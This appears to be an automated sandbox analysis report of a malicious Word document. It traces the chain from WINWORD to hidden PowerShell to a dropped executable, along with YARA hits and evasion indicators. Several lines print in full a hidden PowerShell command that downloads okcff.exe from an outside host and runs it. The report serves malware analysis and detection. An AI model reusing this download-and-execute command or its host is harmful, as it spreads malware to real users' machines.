Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2

Source: C:\Windows\System32\verclsid.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Source: C:\Users\user\AppData\Roaming\okcff.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$478644.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF70A.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@53/21@4/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: 41.0.okcff.exe.400000.5.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 41.0.okcff.exe.400000.5.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 41.0.okcff.exe.400000.7.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 41.0.okcff.exe.400000.7.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 41.0.okcff.exe.400000.9.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 41.0.okcff.exe.400000.9.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source:	Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp

Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Yara detected Costura Assembly Loader

Source: Yara match	File source: 9.2.okcff.exe.1e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.35871d0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.1e30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

Suspicious powershell command line found

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_003D863D pushfd ; ret	9_2_003D8641
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_003D7F95 pushad ; retn 001Ch	9_2_003D7F99
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_003D7FF5 pushfd ; retn 001Ch	9_2_003D8049
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_003D87E0 pushad ; ret	9_2_003D8849
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0211EBEB push esp; retn 001Ch	9_2_0211EBF5
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02181163 pushad ; ret	9_2_02181429
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02181464 pushad ; ret	9_2_02181429
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02189840 push FFFFFF8Bh; ret	9_2_02189843
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_021ABD19 pushfd ; iretd	9_2_021ABD25
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_054297B4 push 850FD83Bh; ret	9_2_054297C1

Binary contains a suspicious time stamp

Source: okcff[1].exe.0.dr

Static PE information: 0xF603599A [Sun Oct 17 00:04:42 2100 UTC]

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\okcff.exe			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
